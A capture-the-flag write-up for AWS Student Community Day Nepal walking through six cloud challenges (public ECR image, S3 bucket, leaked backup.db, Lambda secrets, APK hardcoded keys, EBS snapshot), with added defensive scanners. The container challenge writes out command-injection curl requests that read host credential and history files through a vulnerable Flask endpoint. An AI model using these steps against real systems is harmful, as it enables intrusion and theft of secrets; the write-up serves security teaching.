AWS Student Community Day Nepal CTF Writeup

MISTAKEN IMAGE

This challenge involves finding an ECR image that was mistakenly made public and thereby exposed internal content over the internet.

Navigate to the public ECR Gallery and search for r4s1p1w2/awscloudclubnepal.

Pull the ECR image and run it as a container.

docker pull public.ecr.aws/r4s1p1w2/awscloudclubnepal:latest
sudo docker run -it public.ecr.aws/r4s1p1w2/awscloudclubnepal
/ # ls
bin    etc    home   media  opt    root   sbin   sys    usr
dev    flag   lib    mnt    proc   run    srv    tmp    var
/ # cd flag
/flag # ls
flag.txt
/flag # cat flag.txt 
CTF{nyLLUw66QXkETtij}

Flag: CTF{nyLLUw66QXkETtij}

Key Lessons

  • Ensure ECR images are private unless there is a specific need for them to be public.
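Before an image is pushed to a public registry, its layers can be checked for files that should never ship, such as the /flag/flag.txt found above. The following Python is an added example (not part of the original writeup): it walks a `docker save` style archive layer by layer and reports matches; the pattern list and the in-memory sample image are constructed for this example.

```python
import io
import re
import tarfile

# File paths that should never ship in a public image (constructed list for this example).
SENSITIVE_PATTERNS = [re.compile(p) for p in (
    r"(^|/)flag(\.txt)?$", r"(^|/)\.env$", r"(^|/)\.aws/credentials$", r"\.pem$", r"(^|/)id_rsa$",
)]


def scan_layer(layer_bytes):
    """Return file paths inside one layer tar that match a sensitive pattern."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as layer:
        for member in layer.getmembers():
            path = member.name[2:] if member.name.startswith("./") else member.name
            if member.isfile() and any(p.search(path) for p in SENSITIVE_PATTERNS):
                hits.append(path)
    return hits


def scan_image_tar(image_bytes):
    """Scan every layer tar inside a `docker save` style archive.
    Returns {layer archive name: [sensitive paths]} for layers that contain hits."""
    findings = {}
    with tarfile.open(fileobj=io.BytesIO(image_bytes), mode="r:*") as image:
        for member in image.getmembers():
            if member.isfile() and member.name.endswith(".tar"):
                hits = scan_layer(image.extractfile(member).read())
                if hits:
                    findings[member.name] = hits
    return findings


def _tar_bytes(entries):
    """Build an in-memory tar from (path, bytes) pairs."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in entries:
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_image():
    """Constructed docker-save style archive: one layer holding flag/flag.txt and a harmless binary."""
    layer = _tar_bytes([("flag/flag.txt", b"CTF{constructed}\n"), ("usr/bin/true", b"")])
    return _tar_bytes([("abc123/layer.tar", layer), ("manifest.json", b"[]")])


if __name__ == "__main__":
    print(scan_image_tar(build_sample_image()))  # {'abc123/layer.tar': ['flag/flag.txt']}
```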

PWNED THE BUCKET

This challenge involves identifying an S3 bucket, exploiting its misconfiguration, and uncovering the useful data stored in it.

  • Input: ctf.csaju.com

  • Hint: Use an S3 inspector tool like S3Khoj to find sensitive files in the public bucket.

Use nslookup to gather more information and check where ctf.csaju.com points.

> nslookup ctf.csaju.com
Server: 1.1.1.1
Address: 1.1.1.1#53

Non-authoritative answer:
ctf.csaju.com canonical name = awscommunitydayctf.s3.ap-south-1.amazonaws.com.
awscommunitydayctf.s3.ap-south-1.amazonaws.com canonical name = s3-r-w.ap-south-1.amazonaws.com.

Name: s3-r-w.ap-south-1.amazonaws.com
Address: 52.219.66.51
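The CNAME chain above is what reveals that ctf.csaju.com is backed by an S3 bucket. As an added example (not from the original writeup), the following Python parses nslookup output and classifies S3 endpoint hostnames, generalising beyond this one case to the common S3 hostname shapes; the regex list and the helper names are my own, and the sample input is the output shown above.

```python
import re

# S3 hostname shapes: regional virtual-hosted, static website, legacy global, and the s3-r-w regional alias above.
S3_HOST_PATTERNS = [re.compile(p) for p in (
    r"^(?P<bucket>[a-z0-9.-]+)\.s3\.(?P<region>[a-z0-9-]+)\.amazonaws\.com$",
    r"^(?P<bucket>[a-z0-9.-]+)\.s3-website[.-](?P<region>[a-z0-9-]+)\.amazonaws\.com$",
    r"^(?P<bucket>[a-z0-9.-]+)\.s3\.amazonaws\.com$",
    r"^s3(-r-w)?\.(?P<region>[a-z0-9-]+)\.amazonaws\.com$",
)]

def parse_cname_chain(nslookup_output):
    """Extract (alias, target) pairs from nslookup's 'canonical name =' lines."""
    pairs = []
    for line in nslookup_output.splitlines():
        m = re.match(r"^(\S+)\s+canonical name = (\S+)$", line.strip())
        if m:
            pairs.append((m.group(1).rstrip("."), m.group(2).rstrip(".")))
    return pairs

def classify_s3_host(hostname):
    """Return {'bucket': ..., 'region': ...} if hostname is an S3 endpoint, else None."""
    for pattern in S3_HOST_PATTERNS:
        m = pattern.match(hostname.lower())
        if m:
            return {"bucket": m.groupdict().get("bucket"), "region": m.groupdict().get("region")}
    return None

def find_s3_backed_names(nslookup_output):
    """Follow each CNAME chain from its customer-facing name to the first S3 bucket hop."""
    chain = dict(parse_cname_chain(nslookup_output))
    report = {}
    for name in chain:
        if name in chain.values():
            continue  # intermediate alias, not a starting point
        hop, seen = name, set()
        while hop in chain and hop not in seen:
            seen.add(hop)
            hop = chain[hop]
            info = classify_s3_host(hop)
            if info and info["bucket"]:
                report[name] = info
                break
    return report

# Sample input: the nslookup output from the writeup above.
SAMPLE = """Non-authoritative answer:
ctf.csaju.com canonical name = awscommunitydayctf.s3.ap-south-1.amazonaws.com.
awscommunitydayctf.s3.ap-south-1.amazonaws.com canonical name = s3-r-w.ap-south-1.amazonaws.com.
"""
```

Running the same check over every CNAME in your own zone is a quick way to inventory which public hostnames front an S3 bucket and therefore need their bucket policy reviewed.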

Browse the S3 bucket and extract its objects: “awscommunitydayctf.s3.ap-south-1.amazonaws...

Check the pdf/main.inc object.

Flag: CTF{vZoF4sRjNxTVJXrI}

Key Lessons

  • Ensure the bucket’s permissions are set correctly to prevent unauthorized access; public buckets should be avoided unless explicitly required.

  • Implement workflows to monitor changes in bucket configurations, ensuring any accidental exposure is detected and mitigated promptly.

BREACHED THE DB

This challenge involved an exposed database backup that led to further access.

Fuzz the URL and you will find that a GET request to url/.secrets/backup.db succeeds.

curl https://awscloudclubnepal.com/.secrets/backup.db

Once you have downloaded the file, open backup.db using sqlite3 and look for the stored credentials.

sqlite3 backup.db

You can export those credentials into a custom AWS profile or override your default profile.

aws --region us-east-1 --profile custom-profile dynamodb scan --table-name awscloudclubnepal

Flag: CTF{rMACjkeAqN9pFOAo}

SERVERLESS

This challenge is about the enumeration of serverless function apps.

Let’s export the credentials, which the developer accidentally exposed in commit messages, into our default profile or a custom one.

aws lambda list-functions --region ap-south-1
{
 "Functions": [
 {
 "FunctionName": "EnvBreaches",
 "FunctionArn": "arn:aws:lambda:ap-south-1:288761734723:function:EnvBreaches",
 "Runtime": "python3.10",
 "Role": "arn:aws:iam::288761734723:role/service-role/EnvBreaches-role-9b68sucr",
 "Handler": "lambda_function.lambda_handler",
 "CodeSize": 420,
 "Description": "A starter AWS Lambda function.",
 "Timeout": 3,
 "MemorySize": 128,
 "LastModified": "2024-09-24T11:26:41.000+0000",
 "CodeSha256": "v1xwIoDXIUeuD0DlTfWkCCHYaQpg/RAtlvvfc1IfpV4=",
 "Version": "$LATEST",
 "Environment": {
 "Variables": {
 "SECRET_KEY": "CTF{wow_congrats}"
 }
 },
 "TracingConfig": {
 "Mode": "PassThrough"
 },

Flag: CTF{wow_congrats}
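The list-functions output above shows the secret sitting in plain Lambda environment variables. As an added example (not from the original writeup), the following Python audits that JSON and flags variables whose name, value format or randomness suggests a secret; the name list, entropy threshold and the constructed "Clean" function are my own choices.

```python
import json
import math
import re

# Variable names that usually hold secrets, and the format of AWS access key IDs.
SUSPECT_NAME = re.compile(r"(SECRET|PASSWORD|PASSWD|TOKEN|API_KEY|PRIVATE_KEY|ACCESS_KEY)", re.I)
AWS_KEY_ID = re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")

def shannon_entropy(value):
    """Bits per character; random-looking values score high."""
    if not value:
        return 0.0
    freq = {c: value.count(c) for c in set(value)}
    return -sum(n / len(value) * math.log2(n / len(value)) for n in freq.values())

def audit_function(fn):
    """Return findings for one entry of `aws lambda list-functions` output."""
    findings = []
    variables = fn.get("Environment", {}).get("Variables", {})
    for name, value in variables.items():
        reasons = []
        if SUSPECT_NAME.search(name):
            reasons.append("suspicious variable name")
        if AWS_KEY_ID.search(value):
            reasons.append("looks like an AWS access key ID")
        if len(value) >= 20 and shannon_entropy(value) > 4.0:
            reasons.append("high-entropy value")
        if reasons:
            findings.append({"function": fn["FunctionName"], "variable": name, "reasons": reasons})
    return findings

def audit_list_functions(output_json):
    """Audit the whole JSON document returned by `aws lambda list-functions`."""
    doc = json.loads(output_json)
    return [f for fn in doc.get("Functions", []) for f in audit_function(fn)]

# Sample: the EnvBreaches entry from the output above, plus a constructed clean function.
SAMPLE = json.dumps({"Functions": [
    {"FunctionName": "EnvBreaches", "Environment": {"Variables": {"SECRET_KEY": "CTF{wow_congrats}"}}},
    {"FunctionName": "Clean", "Environment": {"Variables": {"LOG_LEVEL": "INFO"}}},
]})

if __name__ == "__main__":
    for finding in audit_list_functions(SAMPLE):
        print(finding)
```

Secrets that trip this check belong in Secrets Manager or SSM Parameter Store, referenced from the function at runtime, rather than in the function configuration that anyone with lambda:ListFunctions can read.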

Key Lessons

  • Review git logs regularly to ensure sensitive information hasn’t been accidentally pushed.

  • Use pre-commit hooks to scan for sensitive information before the developer commits to the repository.

BALTI

This challenge is about reverse engineering an APK and finding the flag.

  • Input: Reverse engineer the provided APK file and find the flag.

  • Hint: Name of the challenge and access through it

Use Android RE tools like apktool or jadx to decompile the APK. Using jadx, you can see hardcoded AWS credentials in the codebase; these credentials allow you to authenticate to and interact with AWS services.

Let’s export those credentials first and perform some enumeration.

aws sts get-caller-identity
{
 "UserId": "AIDAUGO4KMZB4PGSYXVZZ",
 "Account": "288761734723",
 "Arn": "arn:aws:iam::288761734723:user/mobile"
}

Next, list the IAM policies attached to the user account (mobile). We can see that the user has S3 and IAM policy permissions.

aws iam list-attached-user-policies --user-name mobile
{
 "AttachedPolicies": [
 {
 "PolicyName": "oggy_bhai",
 "PolicyArn": "arn:aws:iam::288761734723:policy/oggy_bhai"
 },
 {
 "PolicyName": "IAMReadOnlyAccess",
 "PolicyArn": "arn:aws:iam::aws:policy/IAMReadOnlyAccess"
 }
 ]
}

Let’s examine the permissions of the oggy_bhai policy. It grants read access to a specific S3 bucket.

aws iam get-policy-version --policy-arn arn:aws:iam::288761734723:policy/oggy_bhai --version-id v11
 {
 "PolicyVersion": {
 "Document": {
 "Version": "2012-10-17",
 "Statement": [
 {
 "Sid": "AllowSpecificBucketActions",
 "Effect": "Allow",
 "Action": [
 "s3:GetObject",
 "s3:ListBucket"
 ],
 "Resource": [
 "arn:aws:s3:::oggyandcockroachesbucket",
 "arn:aws:s3:::oggyandcockroachesbucket/*"
 ]
 },
 {
 "Sid": "AllowIAMPolicyReadAccess",
 "Effect": "Allow",
 "Action": [
 "iam:GetPolicy",
 "iam:GetPolicyVersion"
 ],
 "Resource": "arn:aws:iam::288761734723:policy/oggy_bhai"
 }
 ]
 },
 "VersionId": "v11",
 "IsDefaultVersion": true,
 "CreateDate": "2024-09-27T11:11:45+00:00"
 }
}

Since the policy allows access to the oggyandcockroachesbucket bucket, let’s list the contents and sync them locally.

aws s3 ls s3://oggyandcockroachesbucket
oggy.txt
aws s3 sync s3://oggyandcockroachesbucket .
download: s3://oggyandcockroachesbucket/oggy.txt to ./oggy.txt
cat oggy.txt
tLgxjcbrlmkAoYdR

Flag: CTF{tLgxjcbrlmkAoYdR}

Key Lessons

  • Avoid hardcoding sensitive credentials in your application codebase.

  • Always follow the principle of least privilege. Over-permissive policies can lead to serious security breaches.
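Both the leaked backup.db in BREACHED THE DB and the hardcoded keys in the APK above come down to the same detection problem: AWS key material sitting in artifacts it should never be in. As an added example (not from the original writeup), the following Python scans a SQLite database and decompiled source text for AWS access key IDs and secret key candidates; the sample database and Java snippet are constructed and use AWS's documented example key pair, not real credentials.

```python
import re
import sqlite3

# AWS long-term access key IDs start with AKIA; secret keys are 40 base64-like characters.
ACCESS_KEY_ID = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")
SECRET_KEY = re.compile(r"(?<![A-Za-z0-9/+=])([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+=])")

def scan_text(text, source):
    """Return findings for AWS key material in one blob of text (secrets are redacted)."""
    findings = []
    for m in ACCESS_KEY_ID.finditer(text):
        findings.append({"source": source, "type": "access_key_id", "value": m.group(1)})
    for m in SECRET_KEY.finditer(text):
        findings.append({"source": source, "type": "secret_key_candidate", "value": m.group(1)[:4] + "..."})
    return findings

def scan_sqlite(conn):
    """Walk every table and text cell of a SQLite database (e.g. a leaked backup.db)."""
    findings = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        for row in conn.execute(f'SELECT * FROM "{table}"'):
            for cell in row:
                if isinstance(cell, str):
                    findings.extend(scan_text(cell, f"sqlite:{table}"))
    return findings

def scan_source_files(files):
    """files: {path: text}, e.g. Java produced by jadx from a decompiled APK."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(text, path))
    return findings

# Constructed sample database using AWS's documented example key pair (not real credentials).
def sample_backup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE config (k TEXT, v TEXT)")
    conn.executemany("INSERT INTO config VALUES (?, ?)", [
        ("aws_access_key_id", "AKIAIOSFODNN7EXAMPLE"),
        ("aws_secret_access_key", "wJalrXUtnFEMI/K7MDENG/bPxRfiCyEXAMPLEKEY"),
        ("region", "us-east-1"),
    ])
    return conn

# Constructed decompiled-source sample with the same example pair hardcoded.
SAMPLE_JAVA = {"com/example/app/AwsClient.java":
    'BasicAWSCredentials c = new BasicAWSCredentials("AKIAIOSFODNN7EXAMPLE", '
    '"wJalrXUtnFEMI/K7MDENG/bPxRfiCyEXAMPLEKEY");'}
```

Any access key ID this finds should be treated as compromised and rotated, whichever artifact it turned up in.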

ESCAPE YOUR VESSEL

This challenge involved discovering hidden endpoints on a web server running inside a container, then using a container privilege escalation weakness to reach the host.

  • Input: 13.234.195.12

  • Hint: Check over Docker privilege escalation

To begin, let’s fuzz the input URL for hidden endpoints. I used ffuf to identify hidden endpoints with my custom directory wordlist.

ffuf -w common.txt -u http://13.234.195.12/FUZZ
 /'___\  /'___\           /'___\       
 /\ \__/ /\ \__/  __  __  /\ \__/       
 \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
 \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
 \ \_\   \ \_\  \ \____/  \ \_\       
 \/_/    \/_/   \/___/    \/_/        v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://13.234.195.12/FUZZ
 :: Wordlist         : FUZZ: /home/Documents/ctf/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

hi                      [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 52ms]
health                  [Status: 200, Size: 10, Words: 3, Lines: 1, Duration: 67ms]
:: Progress: [4734/4734] :: Job [1/1] :: 283 req/sec :: Duration: [0:00:17] :: Errors: 0 ::

wordlist: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt

From this, we discovered two endpoints:

  • /hi: accepts POST requests

  • /health: accepts GET requests and returns a simple health-check response

We then tested the endpoint by sending a POST request with a simple command injection payload.

curl -X POST http://13.234.195.12/hi -d 'command=ls'
Dockerfile
app.py

The endpoint was vulnerable to command injection, which allowed us to execute system commands. Let’s inspect the source code to understand how it works.

curl -X POST http://13.234.195.12/hi -d 'command=cat Dockerfile'
FROM python:3.9-slim
WORKDIR /app
COPY . /app
RUN pip install flask
EXPOSE 80
CMD ["python", "app.py"]

The Dockerfile revealed that the app was running a Flask server.

curl -X POST http://13.234.195.12/hi -d 'command=cat app.py'
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def home():
    return 'Welcome to AWS Student Community Day'

@app.route('/health')
def health():
    return 'Site is up'

@app.route('/hi', methods=['POST'])
def execute():
    # The raw form field is handed to a shell: this is the command injection.
    command = request.form.get('command')
    result = os.popen(command).read()
    return result

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

The execute() function behind the /hi endpoint passes the user-supplied value straight to os.popen(), so arbitrary commands run on the underlying system. Further investigation showed that the container had access to the host’s file system: the host’s root directory was mounted at /host inside the container. Let’s confirm.
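The fix for execute() is not to escape the string but to stop handing user input to a shell at all. As an added example (not the challenge's own code), the following Python shows the vulnerable pattern next to a hardened replacement that parses the request into argv, allows only a fixed set of programs and flags, and runs them without a shell; the allowlist and the run_safe/validate_command names are my own, and a Flask handler would call run_safe in place of os.popen.

```python
import os
import shlex
import subprocess

def run_unsafe(command):
    """The pattern from app.py above: the raw field reaches /bin/sh, so shell metacharacters are honoured."""
    return os.popen(command).read()

# Hardened replacement: a fixed allowlist of programs and the flags each may take.
ALLOWED = {"ls": ["-l", "-a"], "df": ["-h"], "uptime": []}

def validate_command(command):
    """Return argv for an allowed command, or None if the request must be rejected."""
    try:
        argv = shlex.split(command)
    except ValueError:          # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None             # 'ls;' or 'cat' are not allowlisted programs
    # Only allowlisted flags; no free-form paths, so nothing can be pointed at /host.
    if any(arg not in ALLOWED[argv[0]] for arg in argv[1:]):
        return None
    return argv

def run_safe(command, timeout=5):
    """Execute only validated argv, without a shell, with a timeout; None means rejected."""
    argv = validate_command(command)
    if argv is None:
        return None
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout, shell=False)
    return result.stdout

if __name__ == "__main__":
    print(validate_command("ls -l"))               # ['ls', '-l']
    print(validate_command("ls; cat /etc/passwd")) # None
```

Note that shell=False alone is not enough: without the allowlist, argv[0] could still be any program on the image, which is why the program and its flags are both constrained.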

curl -X POST http://13.234.195.12/hi -d 'command=df -h'
Filesystem      Size  Used Avail Use% Mounted on
overlay         6.8G  3.2G  3.6G  47% /
tmpfs            64M     0   64M   0% /dev
shm              64M     0   64M   0% /dev/shm
/dev/root       6.8G  3.2G  3.6G  47% /host
devtmpfs        2.0G     0  2.0G   0% /host/dev
tmpfs           2.0G     0  2.0G   0% /host/dev/shm
tmpfs           783M 1004K  782M   1% /host/run
tmpfs           5.0M     0  5.0M   0% /host/run/lock
/dev/loop1       26M   26M     0 100% /host/snap/amazon-ssm-agent/7993
/dev/loop0       56M   56M     0 100% /host/snap/core18/2829
/dev/loop2       39M   39M     0 100% /host/snap/snapd/21759
/dev/xvda16     881M  133M  687M  17% /host/boot
/dev/xvda15     105M  6.1M   99M   6% /host/boot/efi
/dev/loop3       56M   56M     0 100% /host/snap/core18/2846
/dev/loop4       75M   75M     0 100% /host/snap/core22/1621
/dev/loop5       26M   26M     0 100% /host/snap/amazon-ssm-agent/9565

Let’s inspect the bash history of the host’s user to see which files are worth retrieving.

curl -X POST http://13.234.195.12/hi -d 'command=cat /host/home/ubuntu/.bash_history'

Based on .bash_history, recent changes were made in the /var/log directory and to a few files there. Let’s retrieve the content.

curl -X POST http://13.234.195.12/hi -d 'command=cat /host/var/log/flag.txt'

Flag: CTF{PC1RVV1ZA2OI5AP}

Key Lessons

  • Always sanitize user inputs to prevent attackers from executing arbitrary commands.

  • Ensure your container doesn’t have unnecessary access to the host file system.

EXPOSED VOLUME

This challenge was about exploiting a public snapshot of an EBS volume.

Let’s look at the robots.txt of awscloudclubnepal.com. The content of the robots.txt file revealed a snapshot.

Let’s confirm whether the snapshot is public. A developer might accidentally make a snapshot public, exposing more of their environment.

Let’s mount the snapshot on our own instance to explore the contents of the volume. You need to provision an instance first.

From the snapshot you can either create a volume or register an image. Create a new volume from the snapshot.

Attach it to a running, healthy instance.

Mount it on the file system and explore the contents of the snapshot’s volume.

Flag: CTF{LaYwf9G121YxnjKY}

Key Lessons

  • Ensure that snapshots in AWS are not publicly accessible unless intended.

  • Regularly audit your cloud environment for misconfiguration like public snapshots.

Reference

AWS Student Community Day Nepal CTF Writeup | CSaju